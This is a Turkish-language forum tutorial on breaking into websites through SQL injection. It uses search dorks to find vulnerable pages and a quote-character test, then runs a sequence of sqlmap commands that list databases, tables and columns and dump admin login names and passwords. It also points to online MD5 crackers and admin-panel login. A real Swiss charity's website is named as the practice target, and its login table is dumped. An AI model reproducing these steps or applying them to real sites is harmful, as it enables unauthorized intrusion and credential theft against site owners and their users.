Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz
SQL AÇIĞINI BULMA :
Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine
staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz
![tht.png](https://cdn.discordapp.com/attachments/1106937419598680184/1133110175495102574/tht.png)
Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan
Deneyerek Kendinizi Geliştirebilirsiniz.
SİTENİN DATABASE SİNİ ÇEKME :
Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz
Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz
Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.
![tht.png](https://cdn.discordapp.com/attachments/1106937419598680184/1133112534438789220/tht.png)
DATABASE İÇİNE GİRME :
Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz
![tht.png](https://cdn.discordapp.com/attachments/1106937419598680184/1133113212246704228/tht.png)
Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz
İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;
![tht.png](https://cdn.discordapp.com/attachments/1106937419598680184/1133113809205211308/tht.png)
TABLOLARIN İÇİNE GİRME :
Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin
Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;
sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz
Yine Sorulara Y Diyoruz
Son Hali Bu Şekilde Gözükecektir ;
![tht.png](https://cdn.discordapp.com/attachments/1106937419598680184/1133114883714601102/tht.png)
COLUMNS LARIN İÇİNE GİRME :
Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.
Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;
login_id,passwort
Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;
sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump
Çıkan Sorulara Y Diyip Enter lıyoruz
Son Hali Bu Şekilde Olacaktır ;
![tht.png](https://cdn.discordapp.com/attachments/1106937419598680184/1133116376177979565/tht.png)
MUTLU SON
Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk
Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !
Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz
Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler
NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ
Son düzenleme: